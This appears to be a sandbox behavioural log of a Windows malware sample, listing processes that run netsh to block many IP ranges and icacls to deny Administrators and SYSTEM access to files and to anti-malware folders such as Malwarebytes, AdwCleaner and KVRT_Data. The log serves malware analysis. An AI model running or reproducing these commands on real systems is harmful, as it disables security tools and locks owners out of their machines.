netsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.255

PID:4976

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP4" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.255

PID:4996

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP4" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.255

PID:4716

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP5" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.255

PID:1008

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP5" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.255

PID:2696

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP6" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.255

PID:4964

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP6" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.255

PID:4640

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP7" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.255

PID:5024

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP7" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.255

PID:4236

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP8" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.255

PID:4556

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP8" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.255

PID:2968

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP9" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.255

PID:4732

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP9" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.255

PID:3480

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP10" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.248

PID:3908

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP10" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.248

PID:4280

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP11" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.255

PID:4968

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP11" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.255

PID:3696

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP12" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.255

PID:5060

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP12" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.255

PID:1260

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP13" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.255

PID:2028

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP13" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.255

PID:4720

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP14" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.255

PID:4336

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP14" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.255

PID:4288

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP15" protocol=TCP action=block dir=IN remoteip=172.104.56.113

PID:4584

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP15" protocol=TCP action=block dir=IN remoteip=172.104.56.113

PID:4448

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP16" protocol=TCP action=block dir=OUT remoteip=172.104.56.113

PID:4348

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP16" protocol=TCP action=block dir=OUT remoteip=172.104.56.113

PID:3224

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP17" protocol=TCP action=block dir=IN remoteip=178.128.101.72

PID:3000

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP17" protocol=TCP action=block dir=IN remoteip=178.128.101.72

PID:4712

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP18" protocol=TCP action=block dir=out remoteip=178.128.101.72

PID:2776

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP18" protocol=TCP action=block dir=out remoteip=178.128.101.72

PID:4516

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP19" protocol=TCP action=block dir=IN remoteip=210.108.146.96

PID:1532

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP19" protocol=TCP action=block dir=IN remoteip=210.108.146.96

PID:4172

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP20" protocol=TCP action=block dir=out remoteip=210.108.146.96

PID:2036

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP20" protocol=TCP action=block dir=out remoteip=210.108.146.96

PID:4780

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP21" protocol=TCP action=block dir=IN remoteip=176.57.70.81

PID:4824

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP21" protocol=TCP action=block dir=IN remoteip=176.57.70.81

PID:3680

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP22" protocol=TCP action=block dir=out remoteip=176.57.70.81

PID:5008

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP22" protocol=TCP action=block dir=out remoteip=176.57.70.81

PID:4284

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP23" protocol=TCP action=block dir=IN remoteip=61.130.8.22

PID:4576

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP23" protocol=TCP action=block dir=IN remoteip=61.130.8.22

PID:4748

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP24" protocol=TCP action=block dir=out remoteip=61.130.8.22

PID:4296

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP24" protocol=TCP action=block dir=out remoteip=61.130.8.22

PID:4796

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP25" protocol=TCP action=block dir=IN remoteip=134.209.181.186

PID:4892

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP25" protocol=TCP action=block dir=IN remoteip=134.209.181.186

PID:4308

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP26" protocol=TCP action=block dir=out remoteip=134.209.181.186

PID:3764

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP26" protocol=TCP action=block dir=out remoteip=134.209.181.186

PID:4148

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP27" protocol=TCP action=block dir=IN remoteip=134.209.188.169

PID:2348

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP27" protocol=TCP action=block dir=IN remoteip=134.209.188.169

PID:5020

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP28" protocol=TCP action=block dir=out remoteip=134.209.188.169

PID:4116

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP28" protocol=TCP action=block dir=out remoteip=134.209.188.169

PID:4220

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP29" protocol=TCP action=block dir=IN remoteip=165.22.143.11

PID:4852

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP29" protocol=TCP action=block dir=IN remoteip=165.22.143.11

PID:4440

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP30" protocol=TCP action=block dir=out remoteip=165.22.143.11

PID:4904

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP30" protocol=TCP action=block dir=out remoteip=165.22.143.11

PID:5056

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.236

PID:4368

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.236

PID:4648

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=157.230.120.236

PID:4436

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=157.230.120.236

PID:4564

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=156.67.216.61

PID:4816

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=156.67.216.61

PID:400

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=156.67.216.61

PID:4496

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=156.67.216.61

PID:4652

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=165.22.23.102

PID:4944

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=165.22.23.102

PID:4364

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=165.22.23.102

PID:4452

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=165.22.23.102

PID:5032

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=178.128.74.151

PID:4548

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=178.128.74.151

PID:4504

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=178.128.74.151

PID:5096

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=178.128.74.151

PID:2216

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=104.248.92.26

PID:1176

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=104.248.92.26

PID:4272

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=104.248.92.26

PID:4984

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=104.248.92.26

PID:4232

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=167.71.52.230

PID:4936

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=167.71.52.230

PID:4872

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=167.71.52.230

PID:4848

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=167.71.52.230

PID:4776

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny Администраторы:(OI)(CI)(F)

PID:1984

C:\Windows\SysWOW64\icacls.exe

icacls "C:\WINDOWS\inf\lsmm.exe" /deny Администраторы:(OI)(CI)(F)

PID:940

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny system:(OI)(CI)(F)

PID:1896

C:\Windows\SysWOW64\icacls.exe

icacls "C:\WINDOWS\inf\lsmm.exe" /deny system:(OI)(CI)(F)

Modifies file permissions

PID:4380

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny Administrators:(OI)(CI)(F)

PID:4268

C:\Windows\SysWOW64\icacls.exe

icacls "C:\WINDOWS\inf\lsmm.exe" /deny Administrators:(OI)(CI)(F)

Modifies file permissions

PID:4520

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny Администраторы:(OI)(CI)(F)

PID:4476

C:\Windows\SysWOW64\icacls.exe

icacls "C:\WINDOWS\inf\msief.exe" /deny Администраторы:(OI)(CI)(F)

PID:4388

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny system:(OI)(CI)(F)

PID:4136

C:\Windows\SysWOW64\icacls.exe

icacls "C:\WINDOWS\inf\msief.exe" /deny system:(OI)(CI)(F)

PID:3800

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny Administrators:(OI)(CI)(F)

PID:4864

C:\Windows\SysWOW64\icacls.exe

icacls "C:\WINDOWS\inf\msief.exe" /deny Administrators:(OI)(CI)(F)

Modifies file permissions

PID:4420

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny Администраторы:(OI)(CI)(F)

PID:5068

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\NetworkDistribution" /deny Администраторы:(OI)(CI)(F)

Modifies file permissions

PID:4580

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny Administrators:(OI)(CI)(F)

PID:5108

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\NetworkDistribution" /deny Administrators:(OI)(CI)(F)

Modifies file permissions

PID:4808

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny System:(OI)(CI)(F)

PID:4544

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\NetworkDistribution" /deny System:(OI)(CI)(F)

PID:5072

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny Администраторы:(OI)(CI)(F)

PID:5000

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Microsoft JDX" /deny Администраторы:(OI)(CI)(F)

PID:4820

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)

PID:4104

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)

PID:4688

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny Администраторы:(F)

PID:4304

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\java.exe /deny Администраторы:(F)

Modifies file permissions

PID:5356

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny System:(F)

PID:1640

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\java.exe /deny System:(F)

PID:5340

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny система:(F)

PID:4868

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\java.exe /deny система:(F)

PID:5348

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Администраторы:(OI)(CI)(F)

PID:4752

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Администраторы:(OI)(CI)(F)

Modifies file permissions

PID:5484

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)

PID:3544

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)

PID:5476

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny Администраторы:(OI)(CI)(F)

PID:4128

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny Администраторы:(OI)(CI)(F)

Modifies file permissions

PID:5296

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny System:(OI)(CI)(F)

PID:4812

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny System:(OI)(CI)(F)

Modifies file permissions

PID:5304

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny Администраторы:(F)

PID:4608

C:\Windows\SysWOW64\icacls.exe

icacls c:\windows\svchost.exe /deny Администраторы:(F)

Modifies file permissions

PID:5444

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny System:(F)

PID:1252

C:\Windows\SysWOW64\icacls.exe

icacls c:\windows\svchost.exe /deny System:(F)

Modifies file permissions

PID:5424

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny система:(F)

PID:4160

C:\Windows\SysWOW64\icacls.exe

icacls c:\windows\svchost.exe /deny система:(F)

Modifies file permissions

PID:5520

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Администраторы:(OI)(CI)(F)

PID:5172

C:\Windows\SysWOW64\icacls.exe

icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Администраторы:(OI)(CI)(F)

Modifies file permissions

PID:5576

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)

PID:5376

C:\Windows\SysWOW64\icacls.exe

icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)

Modifies file permissions

PID:5620

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny Администраторы:(OI)(CI)(F)

PID:5532

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\Fonts\Mysql" /deny Администраторы:(OI)(CI)(F)

PID:5632

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)

PID:5660

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)

Modifies file permissions

PID:5952

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny Администраторы:(OI)(CI)(F)

PID:5704

C:\Windows\SysWOW64\icacls.exe

icacls "c:\program files\Internet Explorer\bin" /deny Администраторы:(OI)(CI)(F)

PID:6004

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)

PID:5716

C:\Windows\SysWOW64\icacls.exe

icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)

PID:5916

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny Администраторы:(OI)(CI)(F)

PID:5736

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Zaxar" /deny Администраторы:(OI)(CI)(F)

PID:6020

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)

PID:5772

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)

Modifies file permissions

PID:6076

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny Администраторы:(OI)(CI)(F)

PID:5804

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\speechstracing /deny Администраторы:(OI)(CI)(F)

Modifies file permissions

PID:6068

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)

PID:5932

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)

PID:6112

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass.exe /deny Администраторы:(F)

PID:6040

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\lsass.exe /deny Администраторы:(F)

PID:5336

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass.exe /deny System:(F)

PID:3960

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\lsass.exe /deny System:(F)

Modifies file permissions

PID:5312

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\kz.exe /deny Администраторы:(F)

PID:5412

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\kz.exe /deny Администраторы:(F)

Modifies file permissions

PID:5300

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\kz.exe /deny System:(F)

PID:4692

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\kz.exe /deny System:(F)

PID:5408

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\script.exe /deny Администраторы:(F)

PID:2440

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\script.exe /deny Администраторы:(F)

Modifies file permissions

PID:4356

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\script.exe /deny System:(F)

PID:5248

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\script.exe /deny System:(F)

Modifies file permissions

PID:5592

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny Администраторы:(F)

PID:4956

C:\Windows\SysWOW64\icacls.exe

icacls c:\programdata\Malwarebytes /deny Администраторы:(F)

Modifies file permissions

PID:4764

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)

PID:4200

C:\Windows\SysWOW64\icacls.exe

icacls c:\programdata\Malwarebytes /deny System:(F)

Modifies file permissions

PID:4840

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny Администраторы:(F)

PID:4628

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\MB3Install /deny Администраторы:(F)

PID:5224

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)

PID:5216

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\MB3Install /deny System:(F)

PID:4396

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\olly.exe /deny Администраторы:(F)

PID:5236

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\olly.exe /deny Администраторы:(F)

Modifies file permissions

PID:5652

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\olly.exe /deny System:(F)

PID:5456

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\olly.exe /deny System:(F)

Modifies file permissions

PID:5676

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass2.exe /deny Администраторы:(F)

PID:3984

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\lsass2.exe /deny Администраторы:(F)

PID:5948

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass2.exe /deny System:(F)

PID:5968

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\lsass2.exe /deny System:(F)

Modifies file permissions

PID:5764

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\boy.exe /deny Администраторы:(F)

PID:6064

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\boy.exe /deny Администраторы:(F)

PID:5700

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\boy.exe /deny System:(F)

PID:5140

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\boy.exe /deny System:(F)

Modifies file permissions

PID:5908

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny Администраторы:(OI)(CI)(F)

PID:6128

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\Indus /deny Администраторы:(OI)(CI)(F)

Modifies file permissions

PID:5876

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)

PID:5972

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)

Modifies file permissions

PID:5832

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Администраторы:(OI)(CI)(F)

PID:5792

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Администраторы:(OI)(CI)(F)

PID:5324

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)

PID:5368

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)

Modifies file permissions

PID:6084

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny Администраторы:(OI)(CI)(F)

PID:5200

C:\Windows\SysWOW64\icacls.exe

icacls C:\AdwCleaner /deny Администраторы:(OI)(CI)(F)

PID:784

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny Администраторы:(OI)(CI)(F)

PID:4140

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\ByteFence" /deny Администраторы:(OI)(CI)(F)

Modifies file permissions

PID:5264

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny Администраторы:(OI)(CI)(F)

PID:5580

C:\Windows\SysWOW64\icacls.exe

icacls C:\KVRT_Data /deny Администраторы:(OI)(CI)(F)

PID:5608

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)

PID:5404

